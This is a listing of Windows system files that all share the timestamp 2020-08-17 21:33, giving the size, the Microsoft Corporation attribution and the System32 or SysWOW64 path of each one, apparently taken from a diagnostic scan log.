2020-08-17 21:33 - 2020-08-17 21:33 - 001616784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d9.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001587712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001581568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Perception.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001564160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001562424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpserverbase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001559040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pla.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001556200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001550336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.3D.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001539072 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001535288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001531656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3D12.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001525760 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001515008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmgaclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001512960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdprt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001510752 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001507328 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001505320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_fs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001497400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Bluetooth.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001490640 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001484384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001482568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 001477632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dcomp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001467392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001463808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.PointOfService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001458688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001420320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001418832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001410048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001406464 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.Handlers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001397576 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001393960 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001393664 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvruserservice.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001386296 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystemController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001382400 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Editing.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001375232 _____ (Microsoft Corporation) C:\Windows\system32\APMon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001371136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001357824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001348096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001346048 _____ (Microsoft Corporation) C:\Windows\system32\HoloSI.PCShell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001344512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001344512 _____ (Microsoft Corporation) C:\Windows\system32\WMNetMgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001336320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSPhotography.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001334064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ttdrecordcpu.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001330952 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001321472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001319936 _____ (Microsoft Corporation) C:\Windows\system32\webplatstorageserver.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001316352 _____ (Microsoft Corporation) C:\Windows\system32\srmclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001314304 _____ (Microsoft Corporation) C:\Windows\system32\diagperf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001307136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001306944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContentDeliveryManager.Utilities.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001300280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 001297936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_health.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001290192 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Sensors.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001284608 _____ (Microsoft Corporation) C:\Windows\system32\werconcpl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001284608 _____ (Microsoft Corporation) C:\Windows\system32\usermgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001282944 _____ (Microsoft Corporation) C:\Windows\system32\mfreadwrite.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001282872 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2020-08-17 21:33 - 2020-08-17 21:33 - 001272160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001265152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Speech.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001264640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001263616 _____ (Microsoft Corporation) C:\Windows\system32\opengl32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001261568 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001260032 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001257472 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001250816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpsharercom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001248256 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 001247232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001244944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001223168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.FaceAnalysis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001218632 _____ (Microsoft Corporation) C:\Windows\system32\ClipUp.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001218560 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001215488 _____ (Microsoft Corporation) C:\Windows\system32\sdclt.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001214976 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001214264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpbase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001213440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Maps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001197056 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001190912 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Graphics.Display.DisplayEnhancementService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001185792 _____ (Microsoft Corporation) C:\Windows\system32\AgentService.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001184256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.Http.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001182720 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.CommonBridge.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001178608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001170960 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001154656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001153024 _____ (Microsoft Corporation) C:\Windows\system32\windowsperformancerecordercontrol.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001151816 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001138688 _____ (Microsoft Corporation) C:\Windows\system32\nettrace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001126912 _____ (Microsoft Corporation) C:\Windows\system32\ApplySettingsTemplateCatalog.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001125376 _____ (Microsoft Corporation) C:\Windows\system32\CBDHSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001112576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMNetMgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001108040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001107456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Streaming.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001101312 _____ C:\Windows\SysWOW64\TextInputMethodFormatter.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001101312 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Immersive.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001099608 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001098720 _____ (Microsoft Corporation) C:\Windows\system32\DolbyDecMFT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001088000 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001083392 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001077048 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001071616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001066496 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001062912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmgaserver.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001060352 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001059840 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001055184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001048992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001047568 _____ (Microsoft Corporation) C:\Windows\system32\AppVPolicy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001039872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 001034752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Editing.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001031680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsPrint.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001023128 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001020032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001015296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001012792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001009664 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001007672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001003832 _____ (Microsoft Corporation) C:\Windows\system32\DismApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001000960 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Mirage.Internal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000996352 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000995840 _____ (Microsoft Corporation) C:\Windows\system32\EdgeManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000992256 _____ (Microsoft Corporation) C:\Windows\system32\imapi2fs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000986112 _____ (Microsoft Corporation) C:\Windows\system32\Spectrum.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000983040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000982840 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000982016 _____ (Microsoft Corporation) C:\Windows\system32\tapi3.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000980832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000980320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtmpal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000975360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000971776 _____ (Microsoft Corporation) C:\Windows\system32\dsregcmd.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000967680 _____ (Microsoft Corporation) C:\Windows\system32\WebcamUi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000959800 _____ (Microsoft Corporation) C:\Windows\system32\AppVManifest.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000957952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000952416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DolbyDecMFT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000950784 _____ (Microsoft Corporation) C:\Windows\system32\rasapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000947712 _____ (Microsoft Corporation) C:\Windows\system32\mspaint.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000945176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Sensors.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000944640 _____ (Microsoft Corporation) C:\Windows\system32\assignedaccessmanagersvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000941568 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000935040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Taskmgr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000932256 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthService.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000931840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000931328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srmclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000928776 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000924672 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000920064 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000915296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtmcodecs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000914432 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000913408 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Search.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000912896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MiracastReceiver.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000910336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000904704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\opengl32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000904504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000901120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000899584 _____ (Microsoft Corporation) C:\Windows\system32\MdmDiagnostics.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000899072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Immersive.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000897648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000894032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\RecoveryDrive.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000892928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000892048 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000891392 _____ (Microsoft Corporation) C:\Windows\system32\HolographicExtensions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000889416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Shell.Broker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000888352 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000883712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000882688 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000882176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ShareHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000875520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasapi32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000875008 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windowsperformancerecordercontrol.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000868352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi2fs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000867840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000867840 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\efswrt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000861696 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000858112 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000857088 _____ C:\Windows\system32\MBR2GPT.EXE
2020-08-17 21:33 - 2020-08-17 21:33 - 000854528 _____ (Microsoft Corporation) C:\Windows\system32\MrmIndexer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000852992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Streaming.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000850944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tapi3.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000848384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000847168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000845312 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000844096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudExperienceHostCommon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000843776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webplatstorageserver.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000843776 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000836608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TpmCoreProvisioning.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000836608 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000832512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdosys.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000832000 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000829536 _____ (Microsoft Corporation) C:\Windows\system32\BioIso.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000828216 _____ (Microsoft Corporation) C:\Windows\system32\AppVClient.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000827192 _____ (Microsoft Corporation) C:\Windows\system32\AppVOrchestration.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000824848 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000823744 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000822800 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000822072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000819200 _____ (Microsoft Corporation) C:\Windows\system32\LogonController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000816952 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntStreamingManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebcamUi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000814080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\comdlg32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000811160 _____ C:\Windows\SysWOW64\locale.nls
2020-08-17 21:33 - 2020-08-17 21:33 - 000811160 _____ C:\Windows\system32\locale.nls
2020-08-17 21:33 - 2020-08-17 21:33 - 000807936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000806400 _____ (Microsoft Corporation) C:\Windows\system32\fvewiz.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000805888 _____ (Microsoft Corporation) C:\Windows\system32\cscui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000805376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clusapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000801832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\propsys.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000800568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000797448 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000793320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000788992 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000783480 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000782336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000779080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Services.TargetedContent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000778872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppContracts.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000777216 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000776792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
